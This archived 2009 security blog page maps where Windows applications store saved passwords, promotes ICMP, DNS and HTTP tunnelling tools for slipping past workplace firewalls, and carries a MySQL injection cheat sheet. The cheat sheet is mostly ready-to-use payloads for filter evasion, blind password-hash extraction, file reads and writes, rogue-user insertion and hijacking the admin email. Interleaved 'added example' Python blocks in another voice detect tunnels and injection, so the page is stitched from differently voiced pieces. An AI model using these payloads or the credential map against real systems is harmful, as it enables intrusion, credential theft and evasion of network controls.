Archive for the ‘Security’ Category

Saved Password Locations For Popular Windows Applications

Posted in Security, Tips-Thủ thuật  by kissdeath on August 9th, 2009

Many people ask me where in the Registry or file system Windows applications store their passwords. So I prepared a list of password storage locations for more than 20 popular applications and Windows components.
Be aware that even if you know the location of a saved password, that does not mean you can move it from one computer to another. Many applications store passwords in a way that prevents you from moving them to another computer or user profile.
However, you can use this information to remove unwanted saved passwords from your system.

  • Windows Network Passwords (XP/Vista/2003): When you connect to the file system of another computer on your network (something like \\MyComp\MyFolder), Windows allows you to save the password. If you choose to save the password, the encrypted password is stored in a credential file.
    The credential file is stored in the following locations:

    • Windows XP/2003: [Windows Profile]\Application Data\Microsoft\Credentials\[User SID]\Credentials and [Windows Profile]\Local Settings\Application Data\Microsoft\Credentials\[User SID]\Credentials
    • Windows Vista: [Windows Profile]\AppData\Roaming\Microsoft\Credentials\[Random ID] and [Windows Profile]\AppData\Local\Microsoft\Credentials\[Random ID]

    You can use my Network Password Recovery utility to view all passwords stored in these Credentials files.

  • Dialup/VPN Passwords (2000/XP/Vista/2003): Dialup/VPN passwords are stored as LSA secrets under HKEY_LOCAL_MACHINE\Security\Policy\Secrets. This key contains multiple sub-keys, and the sub-keys that store the dialup passwords contain one of the following strings: RasDefaultCredentials and RasDialParams. This key is not accessible from RegEdit and other tools by default, but you can use one of the following methods to access it:
    1. Use the at command to run RegEdit.exe as the SYSTEM user (doesn’t work under Vista).
      For example:
      at 16:14 /interactive regedit.exe
    2. Change the permissions of the entire Security key. If you do that, it’s recommended to return the permissions to the original after you finish.
  • Internet Explorer 4.00 – 6.00: The passwords are stored in a secret location in the Registry known as the “Protected Storage”. The base key of the Protected Storage is located under the following key: “HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”. In order to view the subkeys of this key in RegEdit, you must follow the same procedure as explained for the LSA secrets.
    Even when you browse the above key in the Registry Editor (RegEdit), you won’t be able to see the passwords, because they are encrypted. Also, this key cannot easily be moved from one computer to another, as you can do with regular Registry keys. IE PassView and Protected Storage PassView utilities allow you to recover these passwords.
  • Internet Explorer 7.00 – 8.00: The new versions of Internet Explorer store the passwords in 2 different locations. AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2. HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials, together with login passwords of LAN computers and other passwords. IE PassView can be used to recover these passwords.
  • Firefox: The passwords are stored in one of the following files: signons.txt, signons2.txt, or signons3.txt (depending on the Firefox version). These password files are located inside the Firefox profile folder, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]. Also, key3.db, located in the same folder, is used for encryption/decryption of the passwords.
  • Google Chrome Web browser: The passwords are stored in [Windows Profile]\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data (this file is an SQLite database which contains the encrypted passwords and other data).
  • Opera: The passwords are stored in the wand.dat file, located under [Windows Profile]\Application Data\Opera\Opera\profile.
  • Outlook Express (All Versions): The POP3/SMTP/IMAP passwords of Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.
  • Outlook 98/2000: Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.
  • Outlook 2002-2008: All new versions of Outlook store the passwords in the same Registry key as the account settings. The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index]. If you use Outlook to connect to an account on an Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers. Mail PassView can be used to recover lost passwords of Outlook 2002-2008.
  • Windows Live Mail: All account settings, including the encrypted passwords, are stored in [Windows Profile]\Local Settings\Application Data\Microsoft\Windows Live Mail\[Account Name]. The account file is an XML file with the .oeaccount extension. Mail PassView can be used to recover lost passwords of Windows Live Mail.
  • ThunderBird: The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]. Look for a file with the .s extension.
  • Google Talk: All account settings, including the encrypted passwords, are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[Account Name]
  • Google Desktop: Email passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes\[Account Name]
  • MSN/Windows Messenger version 6.x and below: The passwords are stored in one of the following locations:
    1. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger
    2. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MessengerService
    3. In the Credentials file, with an entry named “Passport.Net\\*”. (Only on Windows XP or later.)
  • MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds\[Account Name]
  • Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with an entry name beginning with “WindowsLive:name=”. These passwords can be recovered by both the Network Password Recovery and MessenPass utilities.
  • Yahoo Messenger 6.x: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager (“EOptions string” value)
  • Yahoo Messenger 7.5 or later: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager – “ETS” value. The value stored in “ETS” value cannot be recovered back to the original password.
  • AIM Pro: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\AIM\AIMPRO\[Account Name]
  • AIM 6.x: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords
  • ICQ Lite 4.x/5.x/2003: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Mirabilis\ICQ\NewOwners\[ICQ Number] (MainLocation value)
  • ICQ 6.x: The password hash is stored in [Windows Profile]\Application Data\ICQ\[User Name]\Owner.mdb (Access Database) (The password hash cannot be recovered back to the original password)
  • Digsby: The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat All other passwords are stored in Digsby servers.
  • PaltalkScene: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name].

PTunnel: TCP over ICMP!

Posted in Security, Softwares  by kissdeath on June 3rd, 2009

There are times when you have only ICMP enabled for the outside world. Nothing else works and you want to get your stuff to work. So what do you do? Simple! Use PTunnel!

Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies. It does so by tunneling TCP connections over ICMP packets.

Its features are:

  • Tunnel TCP using ICMP echo request and reply packets
  • Connections are reliable (lost packets are resent as necessary)
  • Handles multiple connections
  • Acceptable bandwidth (150 kb/s downstream and about 50 kb/s upstream are the currently measured maxima for one tunnel, but with tweaking this can be improved further)
  • Authentication, to prevent just anyone from using your proxy

PTunnel will not work when outgoing or incoming pings are not allowed, or are filtered by a gateway somewhere along the way. Also, it does not do any congestion control. On the plus side, it is open source and supports Linux, Windows and Mac. For Windows, you will also need WinPcap.

Download the latest version 0.70 here.

Using ptunnel

Source.

iodine: IP-over-DNS tunnel!

Posted in Security  by kissdeath on June 2nd, 2009

Okay, so iodine slipped off my mind yesterday while I was writing about DNS2TCP. I also forgot that iodine IS included in BackTrack! My bad.

So, getting back to the point, iodine lets you tunnel IPv4 data through a DNS server. This is usable in situations where internet access is firewalled but DNS queries are allowed (mostly in your offices!). Okay! I heard you alright. You might ask me, what if the DNS port is blocked and you have some weird port open? Worry not! You can set up iodine to use that weird port! Use -p on iodine to specify an alternate port (like -p 5353) and use, for instance, iptables (on Linux) to forward the traffic:

iptables -t nat -A PREROUTING -i eth0 -p udp --dport 53 -j DNAT --to :5353

Cool eh? Wait till you hear this: The name iodine was chosen since it starts with IOD (IP Over DNS) and since iodine has atomic number 53, which happens to be the DNS port number!

Compared to other DNS tunnel implementations, iodine offers:

Higher performance
iodine uses the NULL type that allows the downstream data to be sent without encoding. Each DNS reply can contain nearly a kilobyte of payload data.
Portability
iodine runs on many different UNIX-like systems. Tunnels can be set up between two hosts no matter their endianness or operating system.
Security
iodine uses challenge-response login secured by an MD5 hash. It also filters out any packets not coming from the IP used when logging in. DNS2TCP, at least, does not support this security feature.
Less setup
iodine handles setting IP number on interfaces automatically, and up to 16 users can share one server at the same time. Packet size is automatically probed for maximum downstream throughput.

Also, I have observed that DNS2TCP does not work most of the time because its MTU is greater than 512; 512 bytes is the limit for some DNS servers. In iodine you can use -m to change this option too!
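Both tools above are only a problem on your network if nobody is looking for them. The following is an added example, not code from either project or from the original posts: flow-level heuristics for the two covert channels just described, run over constructed records. A ptunnel-style ICMP tunnel shows up as echo request/reply streams with large payloads and a high byte rate per host pair; an iodine-style DNS tunnel shows up as many queries for long, high-entropy labels under one zone, mostly of type NULL (or TXT), with answers far larger than a normal record. All thresholds, record layouts and sample values are my own assumptions, to be tuned against a real baseline.

```python
"""Added example: spotting ICMP and DNS tunnels from flow records.
The data classes, thresholds and samples are constructed for the demo."""
from collections import defaultdict
from dataclasses import dataclass
import math
import random


@dataclass
class IcmpFlow:
    src: str
    dst: str
    packets: int
    total_bytes: int        # echo payload bytes seen in the window
    window_seconds: float


@dataclass
class DnsQuery:
    client: str
    qname: str
    qtype: str
    answer_bytes: int


def icmp_tunnel_score(flow: IcmpFlow) -> list:
    """Reasons a ping flow looks like a tunnel rather than monitoring traffic."""
    reasons = []
    avg_payload = flow.total_bytes / max(flow.packets, 1)
    if avg_payload > 128:               # default ping payloads are 32 or 56 bytes
        reasons.append(f"large average payload {avg_payload:.0f} B")
    rate = flow.total_bytes / max(flow.window_seconds, 1e-9)
    if rate > 10_000:                   # sustained ~10 kB/s of echo traffic is not monitoring
        reasons.append(f"sustained {rate / 1000:.0f} kB/s over ICMP")
    return reasons


def label_entropy(label: str) -> float:
    """Shannon entropy in bits per character; encoded payload labels score high."""
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0


def zone_of(qname: str) -> str:
    parts = qname.rstrip(".").split(".")
    return ".".join(parts[-2:])


def dns_tunnel_score(queries: list) -> dict:
    """Per zone, the reasons its query stream looks like a tunnel (empty if none)."""
    by_zone = defaultdict(list)
    for q in queries:
        by_zone[zone_of(q.qname)].append(q)
    verdicts = {}
    for zone, qs in by_zone.items():
        reasons = []
        null_or_txt = sum(q.qtype in ("NULL", "TXT") for q in qs)
        if null_or_txt / len(qs) > 0.5:
            reasons.append(f"{null_or_txt}/{len(qs)} NULL/TXT queries")
        subs = [q.qname[: max(len(q.qname) - len(zone) - 1, 0)] for q in qs]
        avg_len = sum(len(s) for s in subs) / len(subs)
        if avg_len > 50:
            reasons.append(f"average subdomain length {avg_len:.0f}")
        avg_ent = sum(label_entropy(s.replace(".", "")) for s in subs) / len(subs)
        if avg_ent > 4.0:
            reasons.append(f"high label entropy {avg_ent:.1f} bits")
        avg_ans = sum(q.answer_bytes for q in qs) / len(qs)
        if avg_ans > 300:               # iodine answers carry nearly a kilobyte each
            reasons.append(f"average answer {avg_ans:.0f} B")
        unique = len({q.qname for q in qs})
        if len(qs) >= 20 and unique / len(qs) > 0.9:
            reasons.append("almost every query name is unique")
        if reasons:
            verdicts[zone] = reasons
    return verdicts


def sample_icmp_flows() -> list:
    # Constructed: ordinary 56-byte pings, then a 30 s burst of 800-byte echoes at ~107 kB/s.
    return [IcmpFlow("10.0.0.5", "203.0.113.9", 20, 1120, 20.0),
            IcmpFlow("10.0.0.7", "198.51.100.4", 4000, 3_200_000, 30.0)]


def sample_dns_queries() -> list:
    # Constructed: normal lookups for example.com plus 40 tunnel-style NULL queries under example.net.
    rng = random.Random(53)
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    normal = [DnsQuery("10.0.0.5", "www.example.com", "A", 60),
              DnsQuery("10.0.0.5", "mail.example.com", "MX", 80)] * 10
    tunnel = [DnsQuery("10.0.0.7", "".join(rng.choice(alphabet) for _ in range(60)) + ".t.example.net",
                       "NULL", 900) for _ in range(40)]
    return normal + tunnel


if __name__ == "__main__":
    for flow in sample_icmp_flows():
        print(flow.src, "->", flow.dst, icmp_tunnel_score(flow))
    print(dns_tunnel_score(sample_dns_queries()))
```

The two scorers are independent so either can be fed from a real source (NetFlow/IPFIX for the ICMP side, resolver query logs for the DNS side); the entropy and label-length tests are what usually separate iodine traffic from ordinary CDN hostnames, while the NULL/TXT ratio alone would miss a tunnel configured for A or CNAME records.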

Windows users, make merry as this tool also has a working Windows port! Read more about this tool here.

Version 0.5.2 Released on 2009-06-01

You can download the Win32 version here and a tar.gz version here.

Webtunnel

Posted in Security, Softwares  by kissdeath on June 2nd, 2009

So, you are at work and all you have are the default HTTP ports open. You still want to use other ports and do things other normal users would do. What do you do in such a case? Simple! Use Webtunnel!

Webtunnel is a network utility that encapsulates arbitrary data in HTTP and transmits it through a web server.

This rings a bell alright! HTTPTunnel! Well, not exactly. It is similar to httptunnel, however, it has several important differences: its server component runs in the context of a web server as a CGI application (with optional FastCGI support), so it does not need its own port, and it supports most things that the web server supports, such as authentication, HTTP 1.1, HTTPS, and client certificates; it uses simple requests and responses, so it works seamlessly through forward and reverse proxies; it is multi-threaded (actually multi-process, using sockets for inter-process communication) to allow multiple parallel connections to multiple destinations simultaneously. Also, HTTPTunnel refuses to work through a reverse proxy. To top it off, it allowed only one connection at a time and required multiple instances to tunnel to different ports!

The good news is that a new version was released yesterday! So, in Webtunnel 0.0.3 you have:
Added child wait in server to fix zombies under FastCGI
Added user authentication based on HTTP user
Added access control lists based on user
Changed the default debug level to 1
Changed some command line behavior

Download and related information is available here:
Download: Get the latest version of the software.
Documentation: Browse the user documentation.
Forums: Discuss with other webtunnel users.
Bugs: Review and submit bug reports.

—————————–

WebTunnel 0.0.6 released!


WHAT’S NEW

2009/05/13

Added an option to be able to include HTTP headers in requests

Download it here.

Source.

ISA Server logging

Posted in English Articles, Security, Templates  by kissdeath on May 18th, 2009

In order to query the log, in addition to the built-in query viewer of ISA, you can install the SQL client tools, then use SQL Analyzer to connect to ISA-SERVER\MSFW (replace ISA-SERVER with your actual server name) and query the log. See the example here.

The built-in query viewer of ISA can show only the first 10,000 log records.

In addition, you can use a script to show the log entries. A sample script can be downloaded here. It can query the last 30 days of the log. Just download it, rename it to a *.vbs file, and run it on your ISA Server. Make sure to change the first 2 input values (LogDate and ClientUserName) in the script file to match your actual data before running it. And don’t forget that the script syntax is cscript LogQuery.vbs [LogData.txt]

Below is a sample result of a script query.
ISA log query using script

To further customize the script, you can study the ISA constants in an SDK include file named comenum.h. Other ISA development topics can be found here.


MySQL Injection Cheat Sheet

Posted in Security  by kissdeath on May 1st, 2009

These are methods for getting around the security measures admins put in place against SQL injection.

Basics.

SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Variations.

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"

SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT VERSION()
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT host,user,db from mysql.db
SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;

Blind injection vectors.

Operators

SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;

Evaluate

All of these evaluate to TRUE (1).
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);

Math

SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);

Misc

SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');

Benchmark

SELECT BENCHMARK(10000000,ENCODE('abc','123'));
this takes around 5 sec on a localhost

SELECT BENCHMARK(1000000,MD5(CHAR(116)))
this takes around 7 sec on a localhost

SELECT BENCHMARK(10000000,MD5(CHAR(116)))
this takes around 70 sec on a localhost

Using the timeout to check if user exists

SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Beware of the N rounds: add an extra zero and it could stall or crash your
browser!

Gathering info

Table mapping

SELECT COUNT(*) FROM tablename

Field mapping

SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;

User mapping

SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors

Writing info into files

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'

Writing info into files without single quotes: (example)

SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39)) INTO
OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))

Note: you must specify a new file (it must not already exist) and give the correct
pathname!

The CHAR() quoteless function

SELECT * FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))

SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes

SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

example:

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5('x')),null) FROM login

explaining: (passwordfield,startcharacter,selectlength)

is like: (password,1,2) this selects: 'ab'
is like: (password,1,3) this selects: 'abc'
is like: (password,1,4) this selects: 'abcd'

A quoteless example:

SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

Possible chars: 0 to 9 – ASCII 48 to 57 ~ a to z – ASCII 97 to 122

Misc

Insert a new user into DB

INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve /etc/passwd file, put it into a field and insert a new user

LOAD DATA INFILE "/etc/passwd" INTO TABLE login (profiletext, @var1) SET user = 'r00t', pass = 'abc'

Then login!

Write the DB user away into tmp

SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change admin e-mail, for “forgot login retrieval.”

UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';

Bypassing PHP functions

(MySQL 4.1.x before 4.1.20 and 5.0.x)

Bypassing addslashes() with GBK encoding

WHERE x = 0xbf27admin 0xbf27

Bypassing mysql_real_escape_string() with BIG5 or GBK

"injection string"
Additional information on:

the above chars are Chinese Big5
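The reason the GBK/Big5 trick works is worth seeing in code, because it decides what the fix is. Added example, not part of the original cheat sheet: a re-implementation of addslashes()-style byte escaping, followed by decoding the result the way a server with a GBK connection charset would. The backslash that addslashes() inserts (0x5c) is a valid GBK trail byte, so a lead byte such as 0xbf placed in front of a quote swallows the backslash into one CJK character and the quote reaches the parser bare. The second half shows the fix a defender should reach for: a bound parameter never passes through the SQL lexer at all (SQLite's stdlib module is used only to demonstrate binding; the table and rows are constructed).

```python
"""Added example: why byte-wise escaping fails under a multi-byte charset,
and why parameter binding does not. addslashes() is re-implemented here."""
import sqlite3


def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping like PHP's addslashes(): backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)          # the inserted backslash
        out.append(b)
    return bytes(out)


def as_gbk(data: bytes) -> str:
    """Decode as a server with a GBK connection charset would see the bytes."""
    return data.decode("gbk", errors="replace")


def has_unescaped_quote(text: str) -> bool:
    """True if an apostrophe appears that is not protected by a backslash."""
    escaped = False
    for ch in text:
        if ch == "'" and not escaped:
            return True
        escaped = (ch == "\\") and not escaped
    return False


def quote_survives_escaping(user_input: bytes) -> bool:
    """Escape, then decode as GBK, and report whether a bare quote reached the parser.
    For b"\\xbf'" the bytes 0xbf 0x5c collapse into one character, freeing the quote."""
    return has_unescaped_quote(as_gbk(addslashes(user_input)))


def lookup_user_safely(user_input: str) -> list:
    """Parameter binding keeps user data out of the SQL text entirely, so no
    charset trick can turn it into syntax. Constructed in-memory table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (user TEXT, pass TEXT)")
    conn.execute("INSERT INTO login VALUES ('admin', 'secret')")
    rows = conn.execute("SELECT user FROM login WHERE user = ?", (user_input,)).fetchall()
    conn.close()
    return rows


if __name__ == "__main__":
    print(quote_survives_escaping(b"'"))       # False: a plain quote is neutralised
    print(quote_survives_escaping(b"\xbf'"))   # True: the lead byte eats the backslash
    print(lookup_user_safely(as_gbk(b"\xbf'") + " OR 1=1"))   # []: just a literal value
```

The same collapse happens with Big5 and any other charset whose trail-byte range includes 0x5c; escaping functions that are not told the connection charset cannot be made safe after the fact, which is why the cheat sheet's MySQL version note matters less than whether the application binds its parameters.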

Advanced Vectors

Using a hex-encoded query to bypass escaping.

Normal:

SELECT * FROM login WHERE user = 'root'

Bypass:

SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL.

Normal:

insert into login set user = 'root', pass = 'root'

Bypass:

insert into login set user = 0x726F6F74, pass = 0x726F6F74

How to determine the HEX value for injection.

SELECT HEX('root');

gives you:

726F6F74

then add:

0x

before it.
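Every trick in the sheet that hides a query from a naive filter (splitting keywords with /**/, 0x hex literals, and CHAR()/CONCAT(CHAR()) quote smuggling) is reversible, and undoing it is the first step of any detection rule worth having. Added example, not code from the original cheat sheet: a small Python normaliser that strips inline comments, decodes hex and CHAR() literals, collapses CONCAT() of plain literals, and then runs a few illustrative rules over the result with string literals masked so keywords inside legitimate data do not fire. The rule list, labels and sample queries are my own; the rules are a teaching sketch, not a complete WAF.

```python
"""Added example: normalise SQL evasion encodings, then apply simple detection rules."""
import re

# A single-quoted SQL literal, with '' as the escaped quote inside it.
LIT = r"'(?:[^']|'')*'"


def sql_quote(text: str) -> str:
    return "'" + text.replace("'", "''") + "'"


def strip_inline_comments(sql: str) -> str:
    """WHE/**/RE -> WHERE; comments are also used to split other keywords."""
    return re.sub(r"/\*.*?\*/", "", sql, flags=re.S)


def decode_hex_literals(sql: str, decoded: list) -> str:
    """0x726F6F74 -> 'root'. Only even-length digit runs are byte strings."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        text = bytes.fromhex(digits).decode("latin-1")
        decoded.append(text)
        return sql_quote(text)
    return re.sub(r"\b0x([0-9A-Fa-f]+)\b", repl, sql)


def decode_char_calls(sql: str, decoded: list) -> str:
    """CHAR(39,97,39) -> the literal 'a' wrapped in quotes, recorded as decoded data."""
    def repl(m):
        text = "".join(chr(int(c)) for c in m.group(1).split(","))
        decoded.append(text)
        return sql_quote(text)
    return re.sub(r"\bCHAR\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", repl, sql, flags=re.I)


def collapse_concat(sql: str) -> str:
    """CONCAT('a','b') of plain literals -> 'ab', so the assembled value is visible."""
    pat = re.compile(r"\bCONCAT\(\s*(" + LIT + r"(?:\s*,\s*" + LIT + r")*)\s*\)", re.I)
    def repl(m):
        parts = re.findall(LIT, m.group(1))
        return sql_quote("".join(p[1:-1].replace("''", "'") for p in parts))
    return pat.sub(repl, sql)


# Illustrative rules, matched against the query with literals masked out.
RULES = [
    (r"(?:\bor\b|\|\|)\s*(\d+)\s*=\s*\1\b", "always-true OR condition"),
    (r"\bunion\s+(?:all\s+)?select\b", "UNION SELECT"),
    (r"\binto\s+(?:outfile|dumpfile)\b", "write to server file"),
    (r"\bload\s+data\b", "read from server file"),
    (r"\b(?:benchmark|sleep)\s*\(", "timing probe"),
    (r";\s*(?:select|show|insert|update|delete)\b", "stacked statement"),
]


def analyze(query: str) -> dict:
    """Return the normalised query and the list of rule labels that fired."""
    decoded = []
    normalized = strip_inline_comments(query)
    normalized = decode_hex_literals(normalized, decoded)
    normalized = decode_char_calls(normalized, decoded)
    normalized = collapse_concat(normalized)
    findings = []
    if any("'" in d for d in decoded):
        findings.append("quote smuggled through CHAR()/hex encoding")
    masked = re.sub(LIT, "?", normalized)
    for pattern, label in RULES:
        if re.search(pattern, masked, flags=re.I):
            findings.append(label)
    return {"normalized": normalized, "findings": findings}


if __name__ == "__main__":
    # Constructed samples, modelled on the sheet's own vectors plus one benign query.
    for q in [
        "SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1",
        "SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(39))",
        "SELECT * FROM login WHERE user = 0x726F6F74",
        "SELECT name FROM items WHERE id = 7",
    ]:
        print(analyze(q))
```

The hex-decoded query is reported clean on purpose: 0x726F6F74 is a legitimate way to write 'root', and the rule that matters is whether the decoded value carries a quote or whether the surrounding statement carries an injection pattern once the comments are gone. A production version would also handle double-quoted literals, `#` and `-- ` comments, and the charset issue shown earlier.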

Source.
